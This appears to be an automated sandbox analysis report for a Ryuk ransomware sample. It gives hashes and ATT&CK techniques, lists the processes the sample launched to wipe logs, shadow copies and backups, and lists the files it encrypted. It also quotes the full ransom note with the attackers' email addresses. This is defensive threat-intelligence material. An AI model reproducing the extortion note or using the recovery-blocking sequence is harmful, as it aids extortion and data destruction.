ryuk | f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea

Analysis

max time kernel
145s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
19-12-2022 22:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
Size

885KB
MD5

154b73d0a7aa19df12364a78b235f29f
SHA1

5e39ad8cd8f05d29b7587a876c318be5c0511dcc
SHA256

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea
SHA512

bf32fb8e846170bb5f2c9505e5577e5d3b31f3f9a43030b5f3268d66f3d11f3c983b231742f0d51488c4a288639c0d9e91a911fec0b016d54047e582695a98e0
SSDEEP

12288:D/2O9w8wycU2JlJYqWYgeWYg955/155/0QebUlAAsjsKqgo7Rn6X:DbC8tUlqgQKUKRjsKqgQN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at scorpion1408@mailfence.com or scorpion1408@cyberfear.com You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

scorpion1408@mailfence.com

scorpion1408@cyberfear.com

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
3360	wevtutil.exe
960	wevtutil.exe
1908
1460	wevtutil.exe
3204	wevtutil.exe
920
568	wevtutil.exe
3864
4288	wevtutil.exe
1304	wevtutil.exe
3228
4772	wevtutil.exe
3748	wevtutil.exe
4764	wevtutil.exe
1496
3908
2244	wevtutil.exe
3644	wevtutil.exe
3936	wevtutil.exe
2208
3052	wevtutil.exe
620
1172	wevtutil.exe
3560	wevtutil.exe
4184	wevtutil.exe
280
2420
4496
2516
1132	wevtutil.exe
4452	wevtutil.exe
1656
3384	wevtutil.exe
212	wevtutil.exe
2180	wevtutil.exe
1472	wevtutil.exe
1548	wevtutil.exe
4160	wevtutil.exe
4320	wevtutil.exe
1552	wevtutil.exe
4344	wevtutil.exe
2188	wevtutil.exe
4936	wevtutil.exe
3284	wevtutil.exe
4860
1188	wevtutil.exe
4676	wevtutil.exe
4732	wevtutil.exe
3896	wevtutil.exe
4512	wevtutil.exe
4056	wevtutil.exe
3436	wevtutil.exe
3552	wevtutil.exe
4776	wevtutil.exe
3528
4652	wevtutil.exe
3448	wevtutil.exe
3636	wevtutil.exe
1876
2304
1684	wevtutil.exe
4276
4160
4648	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

640 bcdedit.exe
1836 bcdedit.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command-Line Interface
T1059

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2024 wbadmin.exe
Disables Task Manager via registry modification
evasion
Disables taskbar notifications via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation cmd.exe

pid	process
640	bcdedit.exe
1836	bcdedit.exe

pid	process
2024	wbadmin.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	cmd.exe

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

212 icacls.exe

pid	process
212	icacls.exe

Enumerates connected drives 3 TTPs 42 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

description	ioc	process
File opened (read-only)	\??\P:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\I:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\T:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\H:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\N:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\B:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\S:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Y:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\A:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Q:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\X:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\F:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\O:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\W:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\Z:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\G:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\M:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\f:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\R:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\U:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\V:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\J:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\K:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened (read-only)	\??\L:	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Drops file in Program Files directory 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

description	ioc	process
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_ja_4.4.0.v20140623020002.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_ghost_profile.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\zh-TW.pak.DATA.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019XC2RVL_MAKC2R-ppd.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\VCCORLIB140_APP.DLL.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages@3x.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\meta\art\01_googleimage.luac.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Professional2019DemoR_BypassTrial180-ppd.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\bwclassic.dotx.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\s_agreement_filetype.svg.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\lb.pak.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\nb-no\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-140.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ro-ro\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-phn.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub2019_eula.txt.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLUEPRNT\PREVIEW.GIF.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ar.pak.DATA.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ul-oob.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Edit.png.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\accessibility.properties.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Help\Keywords.HxK.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hr-hr\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_es.properties.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPoint2019R_OEM_Perp-ul-oob.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Trust Protection Lists\Mu\Advertising.DATA.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-progress.jar.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xsl.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-io-ui.xml.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessEntryR_PrepidBypass-ppd.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GARA.TTF.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Subscription2-pl.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_KMS_Client-ul-oob.xrm-ms.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\TYPE.WAV.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\wordmui.msi.16.en-us.tree.dat.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DBGHELP.DLL.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\ui-strings.js.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File created	C:\Program Files\RyukReadMe.txt	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\DUBAI-LIGHT.TTF.[scorpion1408@mailfence.com].RYK	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

Drops file in Windows directory 5 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exewbadmin.exe

description	ioc	process
File created	C:\Windows\RyukReadMe.txt	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File created	C:\Windows\hrmlog1	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

4776 sc.exe
4204 sc.exe
5020 sc.exe
1684 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1176 schtasks.exe
640
4808 schtasks.exe
920 schtasks.exe
4560 schtasks.exe

pid	process
4776	sc.exe
4204	sc.exe
5020	sc.exe
1684	sc.exe

pid	process
1176	schtasks.exe
640
4808	schtasks.exe
920	schtasks.exe
4560	schtasks.exe

Interacts with shadow copies 2 TTPs 15 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exe

pid	process
4348	vssadmin.exe
1728	vssadmin.exe
2668	vssadmin.exe
2756	vssadmin.exe
1812	vssadmin.exe
4668	vssadmin.exe
3568	vssadmin.exe
4584	vssadmin.exe
3732	vssadmin.exe
3692	vssadmin.exe
2376	vssadmin.exe
1560	vssadmin.exe
1188	vssadmin.exe
1412	vssadmin.exe
2020	vssadmin.exe

Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

4380 taskkill.exe
1688 taskkill.exe
4092 taskkill.exe
4888 taskkill.exe
1032 taskkill.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings cmd.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1556 NOTEPAD.EXE
Runs net.exe

pid	process
4380	taskkill.exe
1688	taskkill.exe
4092	taskkill.exe
4888	taskkill.exe
1032	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000_Classes\Local Settings	cmd.exe

pid	process
1556	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe

pid	process
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
1976	f534d1038be3bf9e0909d28ed1acb77825d1424b691a9259f4b7f605e105aaea.exe
